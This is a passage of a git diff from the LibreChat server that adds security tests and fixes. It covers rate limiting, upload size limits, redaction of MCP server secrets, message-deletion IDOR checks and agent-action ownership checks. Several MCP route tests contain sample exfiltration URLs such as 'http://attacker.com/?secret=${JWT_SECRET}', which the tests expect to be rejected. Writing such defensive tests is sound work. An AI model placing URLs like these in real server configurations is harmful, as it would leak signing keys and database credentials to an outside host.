type=undefined, types=undefined', error, ); expect(res.status).toHaveBeenCalledWith(500); diff --git a/api/server/middleware/limiters/forkLimiters.js b/api/server/middleware/limiters/forkLimiters.js index e0aa65700c..f1e9b15f11 100644 --- a/api/server/middleware/limiters/forkLimiters.js +++ b/api/server/middleware/limiters/forkLimiters.js @@ -48,7 +48,7 @@ const createForkHandler = (ip = true) => { }; await logViolation(req, res, type, errorMessage, forkViolationScore); - res.status(429).json({ message: 'Too many conversation fork requests. Try again later' }); + res.status(429).json({ message: 'Too many requests. Try again later' }); }; }; diff --git a/api/server/routes/__test-utils__/convos-route-mocks.js b/api/server/routes/__test-utils__/convos-route-mocks.js new file mode 100644 index 0000000000..f89b77db3f --- /dev/null +++ b/api/server/routes/__test-utils__/convos-route-mocks.js @@ -0,0 +1,93 @@ +module.exports = { + agents: () => ({ sleep: jest.fn() }), + + api: (overrides = {}) => ({ + isEnabled: jest.fn(), + resolveImportMaxFileSize: jest.fn(() => 262144000), + createAxiosInstance: jest.fn(() => ({ + get: jest.fn(), + post: jest.fn(), + put: jest.fn(), + delete: jest.fn(), + })), + logAxiosError: jest.fn(), + ...overrides, + }), + + dataSchemas: () => ({ + logger: { + debug: jest.fn(), + info: jest.fn(), + warn: jest.fn(), + error: jest.fn(), + }, + createModels: jest.fn(() => ({ + User: {}, + Conversation: {}, + Message: {}, + SharedLink: {}, + })), + }), + + dataProvider: (overrides = {}) => ({ + CacheKeys: { GEN_TITLE: 'GEN_TITLE' }, + EModelEndpoint: { + azureAssistants: 'azureAssistants', + assistants: 'assistants', + }, + ...overrides, + }), + + conversationModel: () => ({ + getConvosByCursor: jest.fn(), + getConvo: jest.fn(), + deleteConvos: jest.fn(), + saveConvo: jest.fn(), + }), + + toolCallModel: () => ({ deleteToolCalls: jest.fn() }), + + sharedModels: () => ({ + deleteAllSharedLinks: jest.fn(), + deleteConvoSharedLink: jest.fn(), + }), + + requireJwtAuth: () => (req, res, next) => next(), + + middlewarePassthrough: () => ({ + createImportLimiters: jest.fn(() => ({ + importIpLimiter: (req, res, next) => next(), + importUserLimiter: (req, res, next) => next(), + })), + createForkLimiters: jest.fn(() => ({ + forkIpLimiter: (req, res, next) => next(), + forkUserLimiter: (req, res, next) => next(), + })), + configMiddleware: (req, res, next) => next(), + validateConvoAccess: (req, res, next) => next(), + }), + + forkUtils: () => ({ + forkConversation: jest.fn(), + duplicateConversation: jest.fn(), + }), + + importUtils: () => ({ importConversations: jest.fn() }), + + logStores: () => jest.fn(), + + multerSetup: () => ({ + storage: {}, + importFileFilter: jest.fn(), + }), + + multerLib: () => + jest.fn(() => ({ + single: jest.fn(() => (req, res, next) => { + req.file = { path: '/tmp/test-file.json' }; + next(); + }), + })), + + assistantEndpoint: () => ({ initializeClient: jest.fn() }), +}; diff --git a/api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js b/api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js new file mode 100644 index 0000000000..788119a569 --- /dev/null +++ b/api/server/routes/__tests__/convos-duplicate-ratelimit.spec.js @@ -0,0 +1,135 @@ +const express = require('express'); +const request = require('supertest'); + +const MOCKS = '../__test-utils__/convos-route-mocks'; + +jest.mock('@librechat/agents', () => require(MOCKS).agents()); +jest.mock('@librechat/api', () => require(MOCKS).api({ limiterCache: jest.fn(() => undefined) })); +jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas()); +jest.mock('librechat-data-provider', () => + require(MOCKS).dataProvider({ ViolationTypes: { FILE_UPLOAD_LIMIT: 'file_upload_limit' } }), +); + +jest.mock('~/cache/logViolation', () => jest.fn().mockResolvedValue(undefined)); +jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores()); +jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel()); +jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel()); +jest.mock('~/models', () => require(MOCKS).sharedModels()); +jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth()); + +jest.mock('~/server/middleware', () => { + const { createForkLimiters } = jest.requireActual('~/server/middleware/limiters/forkLimiters'); + return { + createImportLimiters: jest.fn(() => ({ + importIpLimiter: (req, res, next) => next(), + importUserLimiter: (req, res, next) => next(), + })), + createForkLimiters, + configMiddleware: (req, res, next) => next(), + validateConvoAccess: (req, res, next) => next(), + }; +}); + +jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils()); +jest.mock('~/server/utils/import', () => require(MOCKS).importUtils()); +jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup()); +jest.mock('multer', () => require(MOCKS).multerLib()); +jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint()); +jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint()); + +describe('POST /api/convos/duplicate - Rate Limiting', () => { + let app; + let duplicateConversation; + const savedEnv = {}; + + beforeAll(() => { + savedEnv.FORK_USER_MAX = process.env.FORK_USER_MAX; + savedEnv.FORK_USER_WINDOW = process.env.FORK_USER_WINDOW; + savedEnv.FORK_IP_MAX = process.env.FORK_IP_MAX; + savedEnv.FORK_IP_WINDOW = process.env.FORK_IP_WINDOW; + }); + + afterAll(() => { + for (const key of Object.keys(savedEnv)) { + if (savedEnv[key] === undefined) { + delete process.env[key]; + } else { + process.env[key] = savedEnv[key]; + } + } + }); + + const setupApp = () => { + jest.clearAllMocks(); + jest.isolateModules(() => { + const convosRouter = require('../convos'); + ({ duplicateConversation } = require('~/server/utils/import/fork')); + + app = express(); + app.use(express.json()); + app.use((req, res, next) => { + req.user = { id: 'rate-limit-test-user' }; + next(); + }); + app.use('/api/convos', convosRouter); + }); + + duplicateConversation.mockResolvedValue({ + conversation: { conversationId: 'duplicated-conv' }, + }); + }; + + describe('user limit', () => { + beforeEach(() => { + process.env.FORK_USER_MAX = '2'; + process.env.FORK_USER_WINDOW = '1'; + process.env.FORK_IP_MAX = '100'; + process.env.FORK_IP_WINDOW = '1'; + setupApp(); + }); + + it('should return 429 after exceeding the user rate limit', async () => { + const userMax = parseInt(process.env.FORK_USER_MAX, 10); + + for (let i = 0; i < userMax; i++) { + const res = await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(201); + } + + const res = await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(429); + expect(res.body.message).toMatch(/too many/i); + }); + }); + + describe('IP limit', () => { + beforeEach(() => { + process.env.FORK_USER_MAX = '100'; + process.env.FORK_USER_WINDOW = '1'; + process.env.FORK_IP_MAX = '2'; + process.env.FORK_IP_WINDOW = '1'; + setupApp(); + }); + + it('should return 429 after exceeding the IP rate limit', async () => { + const ipMax = parseInt(process.env.FORK_IP_MAX, 10); + + for (let i = 0; i < ipMax; i++) { + const res = await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(201); + } + + const res = await request(app) + .post('/api/convos/duplicate') + .send({ conversationId: 'conv-123' }); + expect(res.status).toBe(429); + expect(res.body.message).toMatch(/too many/i); + }); + }); +}); diff --git a/api/server/routes/__tests__/convos-import.spec.js b/api/server/routes/__tests__/convos-import.spec.js new file mode 100644 index 0000000000..c4ea139931 --- /dev/null +++ b/api/server/routes/__tests__/convos-import.spec.js @@ -0,0 +1,98 @@ +const express = require('express'); +const request = require('supertest'); +const multer = require('multer'); + +const importFileFilter = (req, file, cb) => { + if (file.mimetype === 'application/json') { + cb(null, true); + } else { + cb(new Error('Only JSON files are allowed'), false); + } +}; + +/** Proxy app that mirrors the production multer + error-handling pattern */ +function createImportApp(fileSize) { + const app = express(); + const upload = multer({ + storage: multer.memoryStorage(), + fileFilter: importFileFilter, + limits: { fileSize }, + }); + const uploadSingle = upload.single('file'); + + function handleUpload(req, res, next) { + uploadSingle(req, res, (err) => { + if (err && err.code === 'LIMIT_FILE_SIZE') { + return res.status(413).json({ message: 'File exceeds the maximum allowed size' }); + } + if (err) { + return next(err); + } + next(); + }); + } + + app.post('/import', handleUpload, (req, res) => { + res.status(201).json({ message: 'success', size: req.file.size }); + }); + + app.use((err, _req, res, _next) => { + res.status(400).json({ error: err.message }); + }); + + return app; +} + +describe('Conversation Import - Multer File Size Limits', () => { + describe('multer rejects files exceeding the configured limit', () => { + it('returns 413 for files larger than the limit', async () => { + const limit = 1024; + const app = createImportApp(limit); + const oversized = Buffer.alloc(limit + 512, 'x'); + + const res = await request(app) + .post('/import') + .attach('file', oversized, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(413); + expect(res.body.message).toBe('File exceeds the maximum allowed size'); + }); + + it('accepts files within the limit', async () => { + const limit = 4096; + const app = createImportApp(limit); + const valid = Buffer.from(JSON.stringify({ title: 'test' })); + + const res = await request(app) + .post('/import') + .attach('file', valid, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(201); + expect(res.body.message).toBe('success'); + }); + + it('rejects at the exact boundary (limit + 1 byte)', async () => { + const limit = 512; + const app = createImportApp(limit); + const boundary = Buffer.alloc(limit + 1, 'a'); + + const res = await request(app) + .post('/import') + .attach('file', boundary, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(413); + }); + + it('accepts a file just under the limit', async () => { + const limit = 512; + const app = createImportApp(limit); + const underLimit = Buffer.alloc(limit - 1, 'b'); + + const res = await request(app) + .post('/import') + .attach('file', underLimit, { filename: 'import.json', contentType: 'application/json' }); + + expect(res.status).toBe(201); + }); + }); +}); diff --git a/api/server/routes/__tests__/convos.spec.js b/api/server/routes/__tests__/convos.spec.js index 931ef006d0..3bdeac32db 100644 --- a/api/server/routes/__tests__/convos.spec.js +++ b/api/server/routes/__tests__/convos.spec.js @@ -1,109 +1,24 @@ const express = require('express'); const request = require('supertest'); -jest.mock('@librechat/agents', () => ({ - sleep: jest.fn(), -})); +const MOCKS = '../__test-utils__/convos-route-mocks'; -jest.mock('@librechat/api', () => ({ - isEnabled: jest.fn(), - createAxiosInstance: jest.fn(() => ({ - get: jest.fn(), - post: jest.fn(), - put: jest.fn(), - delete: jest.fn(), - })), - logAxiosError: jest.fn(), -})); - -jest.mock('@librechat/data-schemas', () => ({ - logger: { - debug: jest.fn(), - info: jest.fn(), - warn: jest.fn(), - error: jest.fn(), - }, - createModels: jest.fn(() => ({ - User: {}, - Conversation: {}, - Message: {}, - SharedLink: {}, - })), -})); - -jest.mock('~/models/Conversation', () => ({ - getConvosByCursor: jest.fn(), - getConvo: jest.fn(), - deleteConvos: jest.fn(), - saveConvo: jest.fn(), -})); - -jest.mock('~/models/ToolCall', () => ({ - deleteToolCalls: jest.fn(), -})); - -jest.mock('~/models', () => ({ - deleteAllSharedLinks: jest.fn(), - deleteConvoSharedLink: jest.fn(), -})); - -jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next()); - -jest.mock('~/server/middleware', () => ({ - createImportLimiters: jest.fn(() => ({ - importIpLimiter: (req, res, next) => next(), - importUserLimiter: (req, res, next) => next(), - })), - createForkLimiters: jest.fn(() => ({ - forkIpLimiter: (req, res, next) => next(), - forkUserLimiter: (req, res, next) => next(), - })), - configMiddleware: (req, res, next) => next(), - validateConvoAccess: (req, res, next) => next(), -})); - -jest.mock('~/server/utils/import/fork', () => ({ - forkConversation: jest.fn(), - duplicateConversation: jest.fn(), -})); - -jest.mock('~/server/utils/import', () => ({ - importConversations: jest.fn(), -})); - -jest.mock('~/cache/getLogStores', () => jest.fn()); - -jest.mock('~/server/routes/files/multer', () => ({ - storage: {}, - importFileFilter: jest.fn(), -})); - -jest.mock('multer', () => { - return jest.fn(() => ({ - single: jest.fn(() => (req, res, next) => { - req.file = { path: '/tmp/test-file.json' }; - next(); - }), - })); -}); - -jest.mock('librechat-data-provider', () => ({ - CacheKeys: { - GEN_TITLE: 'GEN_TITLE', - }, - EModelEndpoint: { - azureAssistants: 'azureAssistants', - assistants: 'assistants', - }, -})); - -jest.mock('~/server/services/Endpoints/azureAssistants', () => ({ - initializeClient: jest.fn(), -})); - -jest.mock('~/server/services/Endpoints/assistants', () => ({ - initializeClient: jest.fn(), -})); +jest.mock('@librechat/agents', () => require(MOCKS).agents()); +jest.mock('@librechat/api', () => require(MOCKS).api()); +jest.mock('@librechat/data-schemas', () => require(MOCKS).dataSchemas()); +jest.mock('librechat-data-provider', () => require(MOCKS).dataProvider()); +jest.mock('~/models/Conversation', () => require(MOCKS).conversationModel()); +jest.mock('~/models/ToolCall', () => require(MOCKS).toolCallModel()); +jest.mock('~/models', () => require(MOCKS).sharedModels()); +jest.mock('~/server/middleware/requireJwtAuth', () => require(MOCKS).requireJwtAuth()); +jest.mock('~/server/middleware', () => require(MOCKS).middlewarePassthrough()); +jest.mock('~/server/utils/import/fork', () => require(MOCKS).forkUtils()); +jest.mock('~/server/utils/import', () => require(MOCKS).importUtils()); +jest.mock('~/cache/getLogStores', () => require(MOCKS).logStores()); +jest.mock('~/server/routes/files/multer', () => require(MOCKS).multerSetup()); +jest.mock('multer', () => require(MOCKS).multerLib()); +jest.mock('~/server/services/Endpoints/azureAssistants', () => require(MOCKS).assistantEndpoint()); +jest.mock('~/server/services/Endpoints/assistants', () => require(MOCKS).assistantEndpoint()); describe('Convos Routes', () => { let app; diff --git a/api/server/routes/__tests__/mcp.spec.js b/api/server/routes/__tests__/mcp.spec.js index 009b602604..1ad8cac087 100644 --- a/api/server/routes/__tests__/mcp.spec.js +++ b/api/server/routes/__tests__/mcp.spec.js @@ -1693,12 +1693,14 @@ describe('MCP Routes', () => { it('should return all server configs for authenticated user', async () => { const mockServerConfigs = { 'server-1': { - endpoint: 'http://server1.com', - name: 'Server 1', + type: 'sse', + url: 'http://server1.com/sse', + title: 'Server 1', }, 'server-2': { - endpoint: 'http://server2.com', - name: 'Server 2', + type: 'sse', + url: 'http://server2.com/sse', + title: 'Server 2', }, }; @@ -1707,7 +1709,18 @@ describe('MCP Routes', () => { const response = await request(app).get('/api/mcp/servers'); expect(response.status).toBe(200); - expect(response.body).toEqual(mockServerConfigs); + expect(response.body['server-1']).toMatchObject({ + type: 'sse', + url: 'http://server1.com/sse', + title: 'Server 1', + }); + expect(response.body['server-2']).toMatchObject({ + type: 'sse', + url: 'http://server2.com/sse', + title: 'Server 2', + }); + expect(response.body['server-1'].headers).toBeUndefined(); + expect(response.body['server-2'].headers).toBeUndefined(); expect(mockRegistryInstance.getAllServerConfigs).toHaveBeenCalledWith('test-user-id'); }); @@ -1762,10 +1775,10 @@ describe('MCP Routes', () => { const response = await request(app).post('/api/mcp/servers').send({ config: validConfig }); expect(response.status).toBe(201); - expect(response.body).toEqual({ - serverName: 'test-sse-server', - ...validConfig, - }); + expect(response.body.serverName).toBe('test-sse-server'); + expect(response.body.type).toBe('sse'); + expect(response.body.url).toBe('https://mcp-server.example.com/sse'); + expect(response.body.title).toBe('Test SSE Server'); expect(mockRegistryInstance.addServer).toHaveBeenCalledWith( 'temp_server_name', expect.objectContaining({ @@ -1819,6 +1832,78 @@ describe('MCP Routes', () => { expect(response.body.message).toBe('Invalid configuration'); }); + it('should reject SSE URL containing env variable references', async () => { + const response = await request(app) + .post('/api/mcp/servers') + .send({ + config: { + type: 'sse', + url: 'http://attacker.com/?secret=${JWT_SECRET}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.addServer).not.toHaveBeenCalled(); + }); + + it('should reject streamable-http URL containing env variable references', async () => { + const response = await request(app) + .post('/api/mcp/servers') + .send({ + config: { + type: 'streamable-http', + url: 'http://attacker.com/?key=${CREDS_KEY}&iv=${CREDS_IV}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.addServer).not.toHaveBeenCalled(); + }); + + it('should reject websocket URL containing env variable references', async () => { + const response = await request(app) + .post('/api/mcp/servers') + .send({ + config: { + type: 'websocket', + url: 'ws://attacker.com/?secret=${MONGO_URI}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.addServer).not.toHaveBeenCalled(); + }); + + it('should redact secrets from create response', async () => { + const validConfig = { + type: 'sse', + url: 'https://mcp-server.example.com/sse', + title: 'Test Server', + }; + + mockRegistryInstance.addServer.mockResolvedValue({ + serverName: 'test-server', + config: { + ...validConfig, + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'admin-secret-key' }, + oauth: { client_id: 'cid', client_secret: 'admin-oauth-secret' }, + headers: { Authorization: 'Bearer leaked-token' }, + }, + }); + + const response = await request(app).post('/api/mcp/servers').send({ config: validConfig }); + + expect(response.status).toBe(201); + expect(response.body.apiKey?.key).toBeUndefined(); + expect(response.body.oauth?.client_secret).toBeUndefined(); + expect(response.body.headers).toBeUndefined(); + expect(response.body.apiKey?.source).toBe('admin'); + expect(response.body.oauth?.client_id).toBe('cid'); + }); + it('should return 500 when registry throws error', async () => { const validConfig = { type: 'sse', @@ -1848,7 +1933,9 @@ describe('MCP Routes', () => { const response = await request(app).get('/api/mcp/servers/test-server'); expect(response.status).toBe(200); - expect(response.body).toEqual(mockConfig); + expect(response.body.type).toBe('sse'); + expect(response.body.url).toBe('https://mcp-server.example.com/sse'); + expect(response.body.title).toBe('Test Server'); expect(mockRegistryInstance.getServerConfig).toHaveBeenCalledWith( 'test-server', 'test-user-id', @@ -1864,6 +1951,29 @@ describe('MCP Routes', () => { expect(response.body).toEqual({ message: 'MCP server not found' }); }); + it('should redact secrets from get response', async () => { + mockRegistryInstance.getServerConfig.mockResolvedValue({ + type: 'sse', + url: 'https://mcp-server.example.com/sse', + title: 'Secret Server', + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'decrypted-admin-key' }, + oauth: { client_id: 'cid', client_secret: 'decrypted-oauth-secret' }, + headers: { Authorization: 'Bearer internal-token' }, + oauth_headers: { 'X-OAuth': 'secret-value' }, + }); + + const response = await request(app).get('/api/mcp/servers/secret-server'); + + expect(response.status).toBe(200); + expect(response.body.title).toBe('Secret Server'); + expect(response.body.apiKey?.key).toBeUndefined(); + expect(response.body.apiKey?.source).toBe('admin'); + expect(response.body.oauth?.client_secret).toBeUndefined(); + expect(response.body.oauth?.client_id).toBe('cid'); + expect(response.body.headers).toBeUndefined(); + expect(response.body.oauth_headers).toBeUndefined(); + }); + it('should return 500 when registry throws error', async () => { mockRegistryInstance.getServerConfig.mockRejectedValue(new Error('Database error')); @@ -1890,7 +2000,9 @@ describe('MCP Routes', () => { .send({ config: updatedConfig }); expect(response.status).toBe(200); - expect(response.body).toEqual(updatedConfig); + expect(response.body.type).toBe('sse'); + expect(response.body.url).toBe('https://updated-mcp-server.example.com/sse'); + expect(response.body.title).toBe('Updated Server'); expect(mockRegistryInstance.updateServer).toHaveBeenCalledWith( 'test-server', expect.objectContaining({ @@ -1902,6 +2014,35 @@ describe('MCP Routes', () => { ); }); + it('should redact secrets from update response', async () => { + const validConfig = { + type: 'sse', + url: 'https://mcp-server.example.com/sse', + title: 'Updated Server', + }; + + mockRegistryInstance.updateServer.mockResolvedValue({ + ...validConfig, + apiKey: { source: 'admin', authorization_type: 'bearer', key: 'preserved-admin-key' }, + oauth: { client_id: 'cid', client_secret: 'preserved-oauth-secret' }, + headers: { Authorization: 'Bearer internal-token' }, + env: { DATABASE_URL: 'postgres://admin:pass@localhost/db' }, + }); + + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ config: validConfig }); + + expect(response.status).toBe(200); + expect(response.body.title).toBe('Updated Server'); + expect(response.body.apiKey?.key).toBeUndefined(); + expect(response.body.apiKey?.source).toBe('admin'); + expect(response.body.oauth?.client_secret).toBeUndefined(); + expect(response.body.oauth?.client_id).toBe('cid'); + expect(response.body.headers).toBeUndefined(); + expect(response.body.env).toBeUndefined(); + }); + it('should return 400 for invalid configuration', async () => { const invalidConfig = { type: 'sse', @@ -1918,6 +2059,51 @@ describe('MCP Routes', () => { expect(response.body.errors).toBeDefined(); }); + it('should reject SSE URL containing env variable references', async () => { + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ + config: { + type: 'sse', + url: 'http://attacker.com/?secret=${JWT_SECRET}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled(); + }); + + it('should reject streamable-http URL containing env variable references', async () => { + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ + config: { + type: 'streamable-http', + url: 'http://attacker.com/?key=${CREDS_KEY}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled(); + }); + + it('should reject websocket URL containing env variable references', async () => { + const response = await request(app) + .patch('/api/mcp/servers/test-server') + .send({ + config: { + type: 'websocket', + url: 'ws://attacker.com/?secret=${MONGO_URI}', + }, + }); + + expect(response.status).toBe(400); + expect(response.body.message).toBe('Invalid configuration'); + expect(mockRegistryInstance.updateServer).not.toHaveBeenCalled(); + }); + it('should return 500 when registry throws error', async () => { const validConfig = { type: 'sse', diff --git a/api/server/routes/__tests__/messages-delete.spec.js b/api/server/routes/__tests__/messages-delete.spec.js new file mode 100644 index 0000000000..e134eecfd0 --- /dev/null +++ b/api/server/routes/__tests__/messages-delete.spec.js @@ -0,0 +1,200 @@ +const mongoose = require('mongoose'); +const express = require('express'); +const request = require('supertest'); +const { v4: uuidv4 } = require('uuid'); +const { MongoMemoryServer } = require('mongodb-memory-server'); + +jest.mock('@librechat/agents', () => ({ + sleep: jest.fn(), +})); + +jest.mock('@librechat/api', () => ({ + unescapeLaTeX: jest.fn((x) => x), + countTokens: jest.fn().mockResolvedValue(10), +})); + +jest.mock('@librechat/data-schemas', () => ({ + ...jest.requireActual('@librechat/data-schemas'), + logger: { + debug: jest.fn(), + info: jest.fn(), + warn: jest.fn(), + error: jest.fn(), + }, +})); + +jest.mock('librechat-data-provider', () => ({ + ...jest.requireActual('librechat-data-provider'), +})); + +jest.mock('~/models', () => ({ + saveConvo: jest.fn(), + getMessage: jest.fn(), + saveMessage: jest.fn(), + getMessages: jest.fn(), + updateMessage: jest.fn(), + deleteMessages: jest.fn(), +})); + +jest.mock('~/server/services/Artifacts/update', () => ({ + findAllArtifacts: jest.fn(), + replaceArtifactContent: jest.fn(), +})); + +jest.mock('~/server/middleware/requireJwtAuth', () => (req, res, next) => next()); + +jest.mock('~/server/middleware', () => ({ + requireJwtAuth: (req, res, next) => next(), + validateMessageReq: (req, res, next) => next(), +})); + +jest.mock('~/models/Conversation', () => ({ + getConvosQueried: jest.fn(), +})); + +jest.mock('~/db/models', () => ({ + Message: { + findOne: jest.fn(), + find: jest.fn(), + meiliSearch: jest.fn(), + }, +})); + +/* ─── Model-level tests: real MongoDB, proves cross-user deletion is prevented ─── */ + +const { messageSchema } = require('@librechat/data-schemas'); + +describe('deleteMessages – model-level IDOR prevention', () => { + let mongoServer; + let Message; + + const ownerUserId = 'user-owner-111'; + const attackerUserId = 'user-attacker-222'; + + beforeAll(async () => { + mongoServer = await MongoMemoryServer.create(); + Message = mongoose.models.Message || mongoose.model('Message', messageSchema); + await mongoose.connect(mongoServer.getUri()); + }); + + afterAll(async () => { + await mongoose.disconnect(); + await mongoServer.stop(); + }); + + beforeEach(async () => { + await Message.deleteMany({}); + }); + + it("should NOT delete another user's message when attacker supplies victim messageId", async () => { + const conversationId = uuidv4(); + const victimMsgId = 'victim-msg-001'; + + await Message.create({ + messageId: victimMsgId, + conversationId, + user: ownerUserId, + text: 'Sensitive owner data', + }); + + await Message.deleteMany({ messageId: victimMsgId, user: attackerUserId }); + + const victimMsg = await Message.findOne({ messageId: victimMsgId }).lean(); + expect(victimMsg).not.toBeNull(); + expect(victimMsg.user).toBe(ownerUserId); + expect(victimMsg.text).toBe('Sensitive owner data'); + }); + + it("should delete the user's own message", async () => { + const conversationId = uuidv4(); + const ownMsgId = 'own-msg-001'; + + await Message.create({ + messageId: ownMsgId, + conversationId, + user: ownerUserId, + text: 'My message', + }); + + const result = await Message.deleteMany({ messageId: ownMsgId, user: ownerUserId }); + expect(result.deletedCount).toBe(1); + + const deleted = await Message.findOne({ messageId: ownMsgId }).lean(); + expect(deleted).toBeNull(); + }); + + it('should scope deletion by conversationId, messageId, and user together', async () => { + const convoA = uuidv4(); + const convoB = uuidv4(); + + await Message.create([ + { messageId: 'msg-a1', conversationId: convoA, user: ownerUserId, text: 'A1' }, + { messageId: 'msg-b1', conversationId: convoB, user: ownerUserId, text: 'B1' }, + ]); + + await Message.deleteMany({ messageId: 'msg-a1', conversationId: convoA, user: attackerUserId }); + + const remaining = await Message.find({ user: ownerUserId }).lean(); + expect(remaining).toHaveLength(2); + }); +}); + +/* ─── Route-level tests: supertest + mocked deleteMessages ─── */ + +describe('DELETE /:conversationId/:messageId – route handler', () => { + let app; + const { deleteMessages } = require('~/models'); + + const authenticatedUserId = 'user-owner-123'; + + beforeAll(() => { + const messagesRouter = require('../messages'); + + app = express(); + app.use(express.json()); + app.use((req, res, next) => { + req.user = { id: authenticatedUserId }; + next(); + }); + app.use('/api/messages', messagesRouter); + }); + + beforeEach(() => { + jest.clearAllMocks(); + }); + + it('should pass user and conversationId in the deleteMessages filter', async () => { + deleteMessages.mockResolvedValue({ deletedCount: 1 }); + + await request(app).delete('/api/messages/convo-1/msg-1'); + + expect(deleteMessages).toHaveBeenCalledTimes(1); + expect(deleteMessages).toHaveBeenCalledWith({ + messageId: 'msg-1', + conversationId: 'convo-1', + user: authenticatedUserId, + }); + }); + + it('should return 204 on successful deletion', async () => { + deleteMessages.mockResolvedValue({ deletedCount: 1 }); + + const response = await request(app).delete('/api/messages/convo-1/msg-owned'); + + expect(response.status).toBe(204); + expect(deleteMessages).toHaveBeenCalledWith({ + messageId: 'msg-owned', + conversationId: 'convo-1', + user: authenticatedUserId, + }); + }); + + it('should return 500 when deleteMessages throws', async () => { + deleteMessages.mockRejectedValue(new Error('DB failure')); + + const response = await request(app).delete('/api/messages/convo-1/msg-1'); + + expect(response.status).toBe(500); + expect(response.body).toEqual({ error: 'Internal server error' }); + }); +}); diff --git a/api/server/routes/agents/actions.js b/api/server/routes/agents/actions.js index 12168ba28a..f3970bff22 100644 --- a/api/server/routes/agents/actions.js +++ b/api/server/routes/agents/actions.js @@ -12,7 +12,11 @@ const { validateActionDomain, validateAndParseOpenAPISpec, } = require('librechat-data-provider'); -const { encryptMetadata, domainParser } = require('~/server/services/ActionService'); +const { + legacyDomainEncode, + encryptMetadata, + domainParser, +} = require('~/server/services/ActionService'); const { findAccessibleResources } = require('~/server/services/PermissionService'); const { getAgent, updateAgent, getListAgentsByAccess } = require('~/models/Agent'); const { updateAction, getActions, deleteAction } = require('~/models/Action'); @@ -119,13 +123,14 @@ router.post( return res.status(400).json({ message: 'Domain not allowed' }); } - let { domain } = metadata; - domain = await domainParser(domain, true); + const encodedDomain = await domainParser(metadata.domain, true); - if (!domain) { + if (!encodedDomain) { return res.status(400).json({ message: 'No domain provided' }); } + const legacyDomain = legacyDomainEncode(metadata.domain); + const action_id = _action_id ?? nanoid(); const initialPromises = []; @@ -143,6 +148,9 @@ router.post( if (actions_result && actions_result.length) { const action = actions_result[0]; + if (action.agent_id !== agent_id) { + return res.status(403).json({ message: 'Action does not belong to this agent' }); + } metadata = { ...action.metadata, ...metadata }; } @@ -157,14 +165,23 @@ router.post( actions.push(action); } - actions.push(`${domain}${actionDelimiter}${action_id}`); + actions.push(`${encodedDomain}${actionDelimiter}${action_id}`); /** @type {string[]}} */ const { tools: _tools = [] } = agent; + const shouldRemoveAgentTool = (tool) => { + if (!tool) { + return false; + } + return ( + tool.includes(encodedDomain) || tool.includes(legacyDomain) || tool.includes(action_id) + ); + }; + const tools = _tools - .filter((tool) => !(tool && (tool.includes(domain) || tool.includes(action_id)))) - .concat(functions.map((tool) => `${tool.function.name}${actionDelimiter}${domain}`)); + .filter((tool) => !shouldRemoveAgentTool(tool)) + .concat(functions.map((tool) => `${tool.function.name}${actionDelimiter}${encodedDomain}`)); // Force version update since actions are changing const updatedAgent = await updateAgent( @@ -184,7 +201,7 @@ router.post( } /** @type {[Action]} */ - const updatedAction = await updateAction({ action_id }, actionUpdateData); + const updatedAction = await updateAction({ action_id, agent_id }, actionUpdateData); const sensitiveFields = ['api_key', 'oauth_client_id', 'oauth_client_secret']; for (let field of sensitiveFields) { @@ -228,22 +245,22 @@ router.delete( const { tools = [], actions = [] } = agent; - let domain = ''; + let storedDomain = ''; const updatedActions = actions.filter((action) => { if (action.includes(action_id)) { - [domain] = action.split(actionDelimiter); + [storedDomain] = action.split(actionDelimiter); return false; } return true; }); - domain = await domainParser(domain, true); - - if (!domain) { + if (!storedDomain) { return res.status(400).json({ message: 'No domain provided' }); } - const updatedTools = tools.filter((tool) => !(tool && tool.includes(domain))); + const updatedTools = tools.filter( + (tool) => !(tool && (tool.includes(storedDomain) || tool.includes(action_id))), + ); // Force version update since actions are being removed await updateAgent( @@ -251,7 +268,13 @@ router.delete( { tools: updatedTools, actions: updatedActions }, { updatingUserId: req.user.id, forceVersion: true }, ); - await deleteAction({ action_id }); + const deleted = await deleteAction({ action_id, agent_id }); + if (!deleted) { + logger.warn('[Agent Action Delete] No matching action document found', { + action_id, + agent_id, + }); + } res.status(200).json({ message: 'Action deleted successfully' }); } catch (error) { const message = 'Trouble deleting the Agent Action'; diff --git a/api/server/routes/agents/index.js b/api/server/routes/agents/index.js index f8d39cb4d8..a99fdca592 100644 --- a/api/server/routes/agents/index.js +++ b/api/server/routes/agents/index.js @@ -76,52 +76,62 @@ router.get('/chat/stream/:streamId', async (req, res) => { logger.debug(`[AgentStream] Client subscribed to ${streamId}, resume: ${isResume}`); - // 